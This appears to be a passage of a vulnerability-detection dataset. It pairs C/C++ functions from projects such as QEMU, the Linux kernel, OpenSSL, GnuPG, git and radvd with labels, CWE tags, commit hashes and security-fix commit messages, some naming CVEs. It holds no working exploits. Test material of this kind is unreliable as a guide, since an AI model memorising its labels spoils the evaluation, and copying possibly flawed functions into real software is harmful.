case OPT_KEY_CACHE_PARTITIONS:
return (uchar**) &key_cache->param_partitions;
}
}
}
return option->value;
}
| 0 |
[
"CWE-362"
] |
server
|
347eeefbfc658c8531878218487d729f4e020805
| 147,811,675,341,782,560,000,000,000,000,000,000,000 | 35 |
don't use my_copystat in the server
it was supposed to be used in command-line tools only.
Different fix for 4e5473862e:
Bug#24388746: PRIVILEGE ESCALATION AND RACE CONDITION USING CREATE TABLE
|
uint64_t address_space_ldq(AddressSpace *as, hwaddr addr,
MemTxAttrs attrs, MemTxResult *result)
{
return address_space_ldq_internal(as, addr, attrs, result,
DEVICE_NATIVE_ENDIAN);
}
| 0 |
[] |
qemu
|
e4a511f8cc6f4a46d409fb5c9f72c38ba45f8d83
| 267,459,853,572,134,740,000,000,000,000,000,000,000 | 6 |
exec: clamp accesses against the MemoryRegionSection
Because the clamping was done against the MemoryRegion,
address_space_rw was effectively broken if a write spanned
multiple sections that are not linear in underlying memory
(with the memory not being under an IOMMU).
This is visible with the MIPS rc4030 IOMMU, which is implemented
as a series of alias memory regions that point to the actual RAM.
Tested-by: Hervé Poussineau <[email protected]>
Tested-by: Mark Cave-Ayland <[email protected]>
Signed-off-by: Paolo Bonzini <[email protected]>
|
static char *savemem(struct nfsd4_compoundargs *argp, __be32 *p, int nbytes)
{
void *ret;
ret = svcxdr_tmpalloc(argp, nbytes);
if (!ret)
return NULL;
memcpy(ret, p, nbytes);
return ret;
}
| 0 |
[
"CWE-20",
"CWE-129"
] |
linux
|
f961e3f2acae94b727380c0b74e2d3954d0edf79
| 12,672,629,511,864,062,000,000,000,000,000,000,000 | 10 |
nfsd: encoders mustn't use unitialized values in error cases
In error cases, lgp->lg_layout_type may be out of bounds; so we
shouldn't be using it until after the check of nfserr.
This was seen to crash nfsd threads when the server receives a LAYOUTGET
request with a large layout type.
GETDEVICEINFO has the same problem.
Reported-by: Ari Kauppi <[email protected]>
Reviewed-by: Christoph Hellwig <[email protected]>
Cc: [email protected]
Signed-off-by: J. Bruce Fields <[email protected]>
|
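The ordering the commit insists on, as a sketch (hypothetical names): validate the status first, then bounds-check, and only then index by a value that is meaningless on error.

#include <stddef.h>

static int encode_sketch(int nfserr, unsigned int layout_type,
                         const void *ops[], size_t nops, const void **out)
{
    if (nfserr)
        return nfserr;          /* layout_type may be garbage here */
    if (layout_type >= nops)
        return -1;              /* bounds check before the lookup */
    *out = ops[layout_type];
    return 0;
}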
DLLIMPORT cfg_value_t *cfg_setopt(cfg_t *cfg, cfg_opt_t *opt, const char *value)
{
cfg_value_t *val = NULL;
const char *s;
char *endptr;
long int i;
double f;
void *p;
int b;
if (!cfg || !opt) {
errno = EINVAL;
return NULL;
}
if (opt->simple_value.ptr) {
if (opt->type == CFGT_SEC) {
errno = EINVAL;
return NULL;
}
val = (cfg_value_t *)opt->simple_value.ptr;
} else {
if (is_set(CFGF_RESET, opt->flags)) {
cfg_free_value(opt);
opt->flags &= ~CFGF_RESET;
}
if (opt->nvalues == 0 || is_set(CFGF_MULTI, opt->flags) || is_set(CFGF_LIST, opt->flags)) {
val = NULL;
if (opt->type == CFGT_SEC && is_set(CFGF_TITLE, opt->flags)) {
unsigned int i;
/* XXX: Check if there already is a section with the same title. */
/*
* Check there are either no sections at
* all, or a non-NULL section title.
*/
if (opt->nvalues != 0 && !value) {
errno = EINVAL;
return NULL;
}
for (i = 0; i < opt->nvalues && val == NULL; i++) {
cfg_t *sec = opt->values[i]->section;
if (is_set(CFGF_NOCASE, cfg->flags)) {
if (strcasecmp(value, sec->title) == 0)
val = opt->values[i];
} else {
if (strcmp(value, sec->title) == 0)
val = opt->values[i];
}
}
if (val && is_set(CFGF_NO_TITLE_DUPES, opt->flags)) {
cfg_error(cfg, _("found duplicate title '%s'"), value);
return NULL;
}
}
if (!val) {
val = cfg_addval(opt);
if (!val)
return NULL;
}
} else {
val = opt->values[0];
}
}
switch (opt->type) {
case CFGT_INT:
if (opt->parsecb) {
if ((*opt->parsecb) (cfg, opt, value, &i) != 0)
return NULL;
} else {
const char *str;
int radix = 0;
if (!value) {
errno = EINVAL;
return NULL;
}
str = value;
if (value[0] == '0') {
switch (value[1]) {
case 'b':
radix = 2;
str = &value[2];
break;
case 'x':
radix = 16;
str = &value[2];
break;
default:
radix = 8;
str = &value[1];
}
}
i = strtol(str, &endptr, radix);
if (*endptr != '\0') {
cfg_error(cfg, _("invalid integer value for option '%s'"), opt->name);
return NULL;
}
if (errno == ERANGE) {
cfg_error(cfg, _("integer value for option '%s' is out of range"), opt->name);
return NULL;
}
}
val->number = i;
break;
case CFGT_FLOAT:
if (opt->parsecb) {
if ((*opt->parsecb) (cfg, opt, value, &f) != 0)
return NULL;
} else {
if (!value) {
errno = EINVAL;
return NULL;
}
f = strtod(value, &endptr);
if (*endptr != '\0') {
cfg_error(cfg, _("invalid floating point value for option '%s'"), opt->name);
return NULL;
}
if (errno == ERANGE) {
cfg_error(cfg, _("floating point value for option '%s' is out of range"), opt->name);
return NULL;
}
}
val->fpnumber = f;
break;
case CFGT_STR:
if (opt->parsecb) {
s = NULL;
if ((*opt->parsecb) (cfg, opt, value, &s) != 0)
return NULL;
} else {
s = value;
}
if (!s) {
errno = EINVAL;
return NULL;
}
free(val->string);
val->string = strdup(s);
if (!val->string)
return NULL;
break;
case CFGT_SEC:
if (is_set(CFGF_MULTI, opt->flags) || val->section == NULL) {
if (val->section) {
val->section->path = NULL; /* Global search path */
cfg_free(val->section);
}
val->section = calloc(1, sizeof(cfg_t));
if (!val->section)
return NULL;
val->section->name = strdup(opt->name);
if (!val->section->name) {
free(val->section);
return NULL;
}
val->section->flags = cfg->flags;
if (is_set(CFGF_KEYSTRVAL, opt->flags))
val->section->flags |= CFGF_KEYSTRVAL;
val->section->filename = cfg->filename ? strdup(cfg->filename) : NULL;
if (cfg->filename && !val->section->filename) {
free(val->section->name);
free(val->section);
return NULL;
}
val->section->line = cfg->line;
val->section->errfunc = cfg->errfunc;
val->section->title = value ? strdup(value) : NULL;
if (value && !val->section->title) {
free(val->section->filename);
free(val->section->name);
free(val->section);
return NULL;
}
val->section->opts = cfg_dupopt_array(opt->subopts);
if (!val->section->opts) {
if (val->section->title)
free(val->section->title);
if (val->section->filename)
free(val->section->filename);
free(val->section->name);
free(val->section);
return NULL;
}
}
if (!is_set(CFGF_DEFINIT, opt->flags))
cfg_init_defaults(val->section);
break;
case CFGT_BOOL:
if (opt->parsecb) {
if ((*opt->parsecb) (cfg, opt, value, &b) != 0)
return NULL;
} else {
b = cfg_parse_boolean(value);
if (b == -1) {
cfg_error(cfg, _("invalid boolean value for option '%s'"), opt->name);
return NULL;
}
}
val->boolean = (cfg_bool_t)b;
break;
case CFGT_PTR:
if (!opt->parsecb) {
errno = EINVAL;
return NULL;
}
if ((*opt->parsecb) (cfg, opt, value, &p) != 0)
return NULL;
if (val->ptr && opt->freecb)
opt->freecb(val->ptr);
val->ptr = p;
break;
default:
cfg_error(cfg, "internal error in cfg_setopt(%s, %s)", opt->name, (value) ? (value) : "NULL");
return NULL;
}
opt->flags |= CFGF_MODIFIED;
return val;
}
| 0 |
[] |
libconfuse
|
d73777c2c3566fb2647727bb56d9a2295b81669b
| 41,006,029,488,040,584,000,000,000,000,000,000,000 | 247 |
Fix #163: unterminated username used with getpwnam()
Signed-off-by: Joachim Wiberg <[email protected]>
|
long dtls1_default_timeout(void)
{
/*
* 2 hours, the 24 hours mentioned in the DTLSv1 spec is way too long for
* http, the cache would over fill
*/
return (60 * 60 * 2);
}
| 0 |
[] |
openssl
|
819418110b6fff4a7b96f01a5d68f71df3e3b736
| 201,929,948,417,343,100,000,000,000,000,000,000,000 | 8 |
Fix Seg fault in DTLSv1_listen
The DTLSv1_listen function is intended to be stateless and processes
the initial ClientHello from many peers. It is common for user code to
loop over the call to DTLSv1_listen until a valid ClientHello is received
with an associated cookie. A defect in the implementation of DTLSv1_listen
means that state is preserved in the SSL object from one invokation to the
next that can lead to a segmentation fault. Erorrs processing the initial
ClientHello can trigger this scenario. An example of such an error could
be that a DTLS1.0 only client is attempting to connect to a DTLS1.2 only
server.
CVE-2015-0207
Reviewed-by: Richard Levitte <[email protected]>
|
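The user-code loop the text refers to, sketched against the modern API (the OpenSSL 1.1.0+ signature; the 1.0.x one differed): every failed pass must leave the SSL object clean, which is exactly the property the bug violated.

#include <openssl/ssl.h>

static void wait_for_client(SSL *ssl, BIO_ADDR *peer)
{
    /* Loop until a ClientHello with a valid cookie arrives. */
    while (DTLSv1_listen(ssl, peer) <= 0)
        ;   /* each iteration must start from a stateless SSL object */
}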
get_keygrip (int pubkey_algo, const char *curve, gcry_mpi_t *pkey,
unsigned char *grip)
{
gpg_error_t err;
gcry_sexp_t s_pkey = NULL;
switch (pubkey_algo)
{
case GCRY_PK_DSA:
err = gcry_sexp_build (&s_pkey, NULL,
"(public-key(dsa(p%m)(q%m)(g%m)(y%m)))",
pkey[0], pkey[1], pkey[2], pkey[3]);
break;
case GCRY_PK_ELG:
err = gcry_sexp_build (&s_pkey, NULL,
"(public-key(elg(p%m)(g%m)(y%m)))",
pkey[0], pkey[1], pkey[2]);
break;
case GCRY_PK_RSA:
err = gcry_sexp_build (&s_pkey, NULL,
"(public-key(rsa(n%m)(e%m)))", pkey[0], pkey[1]);
break;
case GCRY_PK_ECC:
if (!curve)
err = gpg_error (GPG_ERR_BAD_SECKEY);
else if (!strcmp (curve, openpgp_curve_to_oid ("Ed25519", NULL)))
err = gcry_sexp_build (&s_pkey, NULL,
"(public-key(ecc(curve %s)(flags eddsa)(q%m)))",
"Ed25519", pkey[0]);
else
err = gcry_sexp_build (&s_pkey, NULL,
"(public-key(ecc(curve %s)(q%m)))",
curve, pkey[0]);
break;
default:
err = gpg_error (GPG_ERR_PUBKEY_ALGO);
break;
}
if (!err && !gcry_pk_get_keygrip (s_pkey, grip))
err = gpg_error (GPG_ERR_INTERNAL);
gcry_sexp_release (s_pkey);
return err;
}
| 0 |
[
"CWE-20"
] |
gnupg
|
2183683bd633818dd031b090b5530951de76f392
| 65,161,869,208,081,990,000,000,000,000,000,000,000 | 49 |
Use inline functions to convert buffer data to scalars.
* common/host2net.h (buf16_to_ulong, buf16_to_uint): New.
(buf16_to_ushort, buf16_to_u16): New.
(buf32_to_size_t, buf32_to_ulong, buf32_to_uint, buf32_to_u32): New.
--
Commit 91b826a38880fd8a989318585eb502582636ddd8 was not enough to
avoid all sign extension on shift problems. Hanno Böck found a case
with an invalid read due to this problem. To fix that once and for
all almost all uses of "<< 24" and "<< 8" are changed by this patch to
use an inline function from host2net.h.
Signed-off-by: Werner Koch <[email protected]>
|
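The host2net.h helpers the message describes exist to kill sign extension when bytes from a char buffer are shifted into wider integers. A from-scratch sketch of the idea (the helper name follows the message, but this is not GnuPG's source):

#include <stdint.h>

/* If buf[0] is a negative signed char, (buf[0] << 24) sign-extends and
 * smears 1-bits across the high bytes. Routing every byte through
 * unsigned char and an explicit uint32_t cast avoids that entirely. */
static inline uint32_t buf32_to_u32(const void *buffer)
{
    const unsigned char *p = buffer;

    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16)
         | ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}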
static unsigned char convert_num_notes_to_fanout(uintmax_t num_notes)
{
unsigned char fanout = 0;
while ((num_notes >>= 8))
fanout++;
return fanout;
}
| 0 |
[] |
git
|
68061e3470210703cb15594194718d35094afdc0
| 177,869,693,306,201,060,000,000,000,000,000,000,000 | 7 |
fast-import: disallow "feature export-marks" by default
The fast-import stream command "feature export-marks=<path>" lets the
stream write marks to an arbitrary path. This may be surprising if you
are running fast-import against an untrusted input (which otherwise
cannot do anything except update Git objects and refs).
Let's disallow the use of this feature by default, and provide a
command-line option to re-enable it (you can always just use the
command-line --export-marks as well, but the in-stream version provides
an easy way for exporters to control the process).
This is a backwards-incompatible change, since the default is flipping
to the new, safer behavior. However, since the main users of the
in-stream versions would be import/export-based remote helpers, and
since we trust remote helpers already (which are already running
arbitrary code), we'll pass the new option by default when reading a
remote helper's stream. This should minimize the impact.
Note that the implementation isn't totally simple, as we have to work
around the fact that fast-import doesn't parse its command-line options
until after it has read any "feature" lines from the stream. This is how
it lets command-line options override in-stream. But in our case, it's
important to parse the new --allow-unsafe-features first.
There are three options for resolving this:
1. Do a separate "early" pass over the options. This is easy for us to
do because there are no command-line options that allow the
"unstuck" form (so there's no chance of us mistaking an argument
for an option), though it does introduce a risk of incorrect
parsing later (e.g,. if we convert to parse-options).
2. Move the option parsing phase back to the start of the program, but
teach the stream-reading code never to override an existing value.
This is tricky, because stream "feature" lines override each other
(meaning we'd have to start tracking the source for every option).
3. Accept that we might parse a "feature export-marks" line that is
forbidden, as long as we don't _act_ on it until after we've parsed
the command line options.
This would, in fact, work with the current code, but only because
the previous patch fixed the export-marks parser to avoid touching
the filesystem.
So while it works, it does carry risk of somebody getting it wrong
in the future in a rather subtle and unsafe way.
I've gone with option (1) here as simple, safe, and unlikely to cause
regressions.
This fixes CVE-2019-1348.
Signed-off-by: Jeff King <[email protected]>
|
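Option (1) from the message — a separate early pass over argv for the one flag that must be known before any stream "feature" line is parsed — can be sketched as below. This illustrates the approach only; it is not fast-import's code:

#include <string.h>

static int allow_unsafe_features;

/* Scan argv before stream parsing begins; fast-import has no "unstuck"
 * option forms, so a plain string compare cannot mistake an argument
 * for an option. */
static void parse_early_options(int argc, char **argv)
{
    int i;

    for (i = 1; i < argc; i++) {
        if (!strcmp(argv[i], "--allow-unsafe-features"))
            allow_unsafe_features = 1;
    }
}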
void InstanceKlass::purge_previous_version_list() {
assert(SafepointSynchronize::is_at_safepoint(), "only called at safepoint");
assert(has_been_redefined(), "Should only be called for main class");
// Quick exit.
if (previous_versions() == NULL) {
return;
}
// This klass has previous versions so see what we can cleanup
// while it is safe to do so.
int deleted_count = 0; // leave debugging breadcrumbs
int live_count = 0;
ClassLoaderData* loader_data = class_loader_data();
assert(loader_data != NULL, "should never be null");
ResourceMark rm;
log_trace(redefine, class, iklass, purge)("%s: previous versions", external_name());
// previous versions are linked together through the InstanceKlass
InstanceKlass* pv_node = previous_versions();
InstanceKlass* last = this;
int version = 0;
// check the previous versions list
for (; pv_node != NULL; ) {
ConstantPool* pvcp = pv_node->constants();
assert(pvcp != NULL, "cp ref was unexpectedly cleared");
if (!pvcp->on_stack()) {
// If the constant pool isn't on stack, none of the methods
// are executing. Unlink this previous_version.
// The previous version InstanceKlass is on the ClassLoaderData deallocate list
// so will be deallocated during the next phase of class unloading.
log_trace(redefine, class, iklass, purge)
("previous version " INTPTR_FORMAT " is dead.", p2i(pv_node));
// For debugging purposes.
pv_node->set_is_scratch_class();
// Unlink from previous version list.
assert(pv_node->class_loader_data() == loader_data, "wrong loader_data");
InstanceKlass* next = pv_node->previous_versions();
pv_node->link_previous_versions(NULL); // point next to NULL
last->link_previous_versions(next);
// Delete this node directly. Nothing is referring to it and we don't
// want it to increase the counter for metadata to delete in CLDG.
MetadataFactory::free_metadata(loader_data, pv_node);
pv_node = next;
deleted_count++;
version++;
continue;
} else {
log_trace(redefine, class, iklass, purge)("previous version " INTPTR_FORMAT " is alive", p2i(pv_node));
assert(pvcp->pool_holder() != NULL, "Constant pool with no holder");
guarantee (!loader_data->is_unloading(), "unloaded classes can't be on the stack");
live_count++;
// found a previous version for next time we do class unloading
_has_previous_versions = true;
}
// next previous version
last = pv_node;
pv_node = pv_node->previous_versions();
version++;
}
log_trace(redefine, class, iklass, purge)
("previous version stats: live=%d, deleted=%d", live_count, deleted_count);
}
| 0 |
[] |
jdk17u
|
f8eb9abe034f7c6bea4da05a9ea42017b3f80730
| 43,675,006,754,265,100,000,000,000,000,000,000,000 | 69 |
8270386: Better verification of scan methods
Reviewed-by: coleenp
Backport-of: ac329cef45979bd0159ecd1347e36f7129bb2ce4
|
static VALUE cState_initialize(int argc, VALUE *argv, VALUE self)
{
VALUE opts;
GET_STATE(self);
state->max_nesting = 100;
state->buffer_initial_length = FBUFFER_INITIAL_LENGTH_DEFAULT;
rb_scan_args(argc, argv, "01", &opts);
if (!NIL_P(opts)) cState_configure(self, opts);
return self;
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
json
|
8f782fd8e181d9cfe9387ded43a5ca9692266b85
| 33,301,476,397,015,310,000,000,000,000,000,000,000 | 10 |
Fix arbitrary heap exposure problem
|
void sctp_packet_free(struct sctp_packet *packet)
{
struct sctp_chunk *chunk, *tmp;
SCTP_DEBUG_PRINTK("%s: packet:%p\n", __func__, packet);
list_for_each_entry_safe(chunk, tmp, &packet->chunk_list, list) {
list_del_init(&chunk->list);
sctp_chunk_free(chunk);
}
if (packet->malloced)
kfree(packet);
}
| 0 |
[] |
linux
|
196d67593439b03088913227093e374235596e33
| 281,072,648,790,618,220,000,000,000,000,000,000,000 | 14 |
sctp: Add support to per-association statistics via a new SCTP_GET_ASSOC_STATS call
The current SCTP stack is lacking a mechanism to have per association
statistics. This is an implementation modeled after OpenSolaris'
SCTP_GET_ASSOC_STATS.
Userspace part will follow on lksctp if/when there is a general ACK on
this.
V4:
- Move ipackets++ before q->immediate.func() for consistency reasons
- Move sctp_max_rto() at the end of sctp_transport_update_rto() to avoid
returning bogus RTO values
- return asoc->rto_min when max_obs_rto value has not changed
V3:
- Increase ictrlchunks in sctp_assoc_bh_rcv() as well
- Move ipackets++ to sctp_inq_push()
- return 0 when no rto updates took place since the last call
V2:
- Implement partial retrieval of stat struct to cope for future expansion
- Kill the rtxpackets counter as it cannot be precise anyway
- Rename outseqtsns to outofseqtsns to make it clearer that these are out
of sequence unexpected TSNs
- Move asoc->ipackets++ under a lock to avoid potential miscounts
- Fold asoc->opackets++ into the already existing asoc check
- Kill unneeded (q->asoc) test when increasing rtxchunks
- Do not count octrlchunks if sending failed (SCTP_XMIT_OK != 0)
- Don't count SHUTDOWNs as SACKs
- Move SCTP_GET_ASSOC_STATS to the private space API
- Adjust the len check in sctp_getsockopt_assoc_stats() to allow for
future struct growth
- Move association statistics in their own struct
- Update idupchunks when we send a SACK with dup TSNs
- return min_rto in max_rto when RTO has not changed. Also return the
transport when max_rto last changed.
Signed-off-by: Michele Baldessari <[email protected]>
Acked-by: Vlad Yasevich <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
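From userspace, the new option described above is a getsockopt() on the SCTP socket. A sketch of the call shape, assuming the sctp_assoc_stats layout from the lksctp headers (treat the field and constant names as following the message, not as a verified ABI):

#include <netinet/sctp.h>
#include <sys/socket.h>

/* Query per-association statistics for one association id. */
static int get_assoc_stats(int sd, sctp_assoc_t id,
                           struct sctp_assoc_stats *stats)
{
    socklen_t len = sizeof(*stats);

    stats->sas_assoc_id = id;   /* in: which association to query */
    return getsockopt(sd, IPPROTO_SCTP, SCTP_GET_ASSOC_STATS,
                      stats, &len);
}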
static bool kvm_vcpu_write_protect_gfn(struct kvm_vcpu *vcpu, u64 gfn)
{
struct kvm_memory_slot *slot;
slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn);
return kvm_mmu_slot_gfn_write_protect(vcpu->kvm, slot, gfn, PG_LEVEL_4K);
}
| 0 |
[
"CWE-476"
] |
linux
|
9f46c187e2e680ecd9de7983e4d081c3391acc76
| 45,496,953,058,833,130,000,000,000,000,000,000,000 | 7 |
KVM: x86/mmu: fix NULL pointer dereference on guest INVPCID
With shadow paging enabled, the INVPCID instruction results in a call
to kvm_mmu_invpcid_gva. If INVPCID is executed with CR0.PG=0, the
invlpg callback is not set and the result is a NULL pointer dereference.
Fix it trivially by checking for mmu->invlpg before every call.
There are other possibilities:
- check for CR0.PG, because KVM (like all Intel processors after P5)
flushes guest TLB on CR0.PG changes so that INVPCID/INVLPG are a
nop with paging disabled
- check for EFER.LMA, because KVM syncs and flushes when switching
MMU contexts outside of 64-bit mode
All of these are tricky, go for the simple solution. This is CVE-2022-1789.
Reported-by: Yongkang Jia <[email protected]>
Cc: [email protected]
Signed-off-by: Paolo Bonzini <[email protected]>
|
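The "trivial" fix the message describes is a guard on the indirect call, since shadow paging with CR0.PG=0 leaves the callback unset. A sketch of that guard; names follow the message and the argument list is illustrative, not the kernel diff:

/* Guard every call through the optional invlpg callback. */
if (mmu->invlpg)
    mmu->invlpg(vcpu, gva, root_hpa);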
if_command()
{
if_else_command(IF_INITIAL);
return;
}
| 0 |
[
"CWE-415"
] |
gnuplot
|
052cbd17c3cbbc602ee080b2617d32a8417d7563
| 171,826,649,113,606,440,000,000,000,000,000,000,000 | 5 |
successive failures of "set print <foo>" could cause double-free
Bug #2312
|
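The usual cure for this class of double-free is to clear the pointer when the resource is released, so a second failed "set print" cannot free it again. A sketch with hypothetical names, not gnuplot's actual patch:

/* Release the current print destination exactly once. */
if (print_out != NULL && print_out != stdout) {
    fclose(print_out);
    print_out = NULL;   /* a later failure path now sees NULL, not a stale FILE* */
}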
privsep_read_loop(void)
{
struct privsep_command cmd;
int ret;
while (1) {
ret = readn(pfd, &cmd, sizeof(cmd));
if (ret <= 0) {
/* Error or EOF, give up */
if (ret < 0) {
flog(LOG_ERR, "Exiting, privsep_read_loop had readn error: %s\n",
strerror(errno));
} else {
flog(LOG_ERR, "Exiting, privsep_read_loop had readn return 0 bytes\n");
}
close(pfd);
_exit(0);
}
if (ret != sizeof(cmd)) {
/* Short read, ignore */
return;
}
cmd.iface[IFNAMSIZ-1] = '\0';
switch(cmd.type) {
case SET_INTERFACE_LINKMTU:
if (cmd.val < MIN_AdvLinkMTU || cmd.val > MAX_AdvLinkMTU) {
flog(LOG_ERR, "(privsep) %s: LinkMTU (%u) is not within the defined bounds, ignoring", cmd.iface, cmd.val);
break;
}
ret = set_interface_var(cmd.iface, PROC_SYS_IP6_LINKMTU, "LinkMTU", cmd.val);
break;
case SET_INTERFACE_CURHLIM:
if (cmd.val < MIN_AdvCurHopLimit || cmd.val > MAX_AdvCurHopLimit) {
flog(LOG_ERR, "(privsep) %s: CurHopLimit (%u) is not within the defined bounds, ignoring", cmd.iface, cmd.val);
break;
}
ret = set_interface_var(cmd.iface, PROC_SYS_IP6_CURHLIM, "CurHopLimit", cmd.val);
break;
case SET_INTERFACE_REACHTIME:
if (cmd.val < MIN_AdvReachableTime || cmd.val > MAX_AdvReachableTime) {
flog(LOG_ERR, "(privsep) %s: BaseReachableTimer (%u) is not within the defined bounds, ignoring", cmd.iface, cmd.val);
break;
}
ret = set_interface_var(cmd.iface, PROC_SYS_IP6_BASEREACHTIME_MS, "BaseReachableTimer (ms)", cmd.val);
if (ret == 0)
break;
set_interface_var(cmd.iface, PROC_SYS_IP6_BASEREACHTIME, "BaseReachableTimer", cmd.val / 1000);
break;
case SET_INTERFACE_RETRANSTIMER:
if (cmd.val < MIN_AdvRetransTimer || cmd.val > MAX_AdvRetransTimer) {
flog(LOG_ERR, "(privsep) %s: RetransTimer (%u) is not within the defined bounds, ignoring", cmd.iface, cmd.val);
break;
}
ret = set_interface_var(cmd.iface, PROC_SYS_IP6_RETRANSTIMER_MS, "RetransTimer (ms)", cmd.val);
if (ret == 0)
break;
set_interface_var(cmd.iface, PROC_SYS_IP6_RETRANSTIMER, "RetransTimer", cmd.val / 1000 * USER_HZ); /* XXX user_hz */
break;
default:
/* Bad command */
break;
}
}
}
| 0 |
[
"CWE-20"
] |
radvd
|
074816cd0b37aac7b3209987e6e998f0a847b275
| 262,336,770,397,884,330,000,000,000,000,000,000,000 | 71 |
privsep_read_loop() should return on unprivileged daemon death or
socket close(), rather than looping forever while a polling read() keeps returning -1.
|
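The loop above depends on a readn() contract: the byte count on success, 0 on EOF (the unprivileged daemon died or closed the socket), and -1 on error, which is why both non-positive results must end the privileged loop instead of spinning. An illustrative implementation of that contract, not radvd's:

#include <unistd.h>

/* Read exactly n bytes unless EOF or an error intervenes. */
static ssize_t readn(int fd, void *buf, size_t n)
{
    size_t left = n;
    char *p = buf;

    while (left > 0) {
        ssize_t r = read(fd, p, left);
        if (r < 0)
            return -1;      /* error: caller must give up */
        if (r == 0)
            break;          /* EOF: return the short count (0 if nothing read) */
        p += r;
        left -= r;
    }
    return (ssize_t)(n - left);
}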